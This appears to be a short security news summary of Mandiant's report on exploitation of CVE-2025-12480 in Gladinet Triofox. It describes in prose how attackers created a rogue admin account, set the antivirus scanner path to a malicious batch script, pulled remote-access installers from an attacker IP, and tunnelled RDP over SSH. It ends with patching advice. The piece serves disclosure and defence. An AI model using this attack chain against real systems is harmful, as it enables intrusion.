Mandiant Threat Defense has revealed exploitation of a critical vulnerability in Gladinet's Triofox platform, tracked as CVE-2025-12480.
Timeline and Actions
The flaw, with a CVSS score of 9.1, allowed unauthorized access to Triofox's configuration pages. Attackers used this access to upload and execute arbitrary data by creating a native admin account named Cluster Admin. Mandiant observed these activities by threat cluster UNC6485 starting from 2025-08-24.
- Triofox users were vulnerable starting 2025-08-24.
- Exploit allowed attackers to execute malicious files as SYSTEM.
- Exploitation included deploying Zoho Assist and AnyDesk for deeper intrusion.
- Actions recommended: update Triofox, audit admin accounts.
Exploitation Details
Attackers configured the antivirus scanner to a malicious script named "centre_report.bat." This script downloaded Zoho UEMS installer files from 84.200.80.252 to support remote access via tools like Zoho Assist, enabling reconnaissance and privilege escalation efforts. Additional tools such as Plink and PuTTY were employed to establish SSH tunnels over port 443, facilitating inbound Remote Desktop Protocol (RDP) access.
Mandiant advises clients to update Triofox to the latest version, carefully audit administrator accounts, and ensure the antivirus settings prohibit unauthorized script execution.
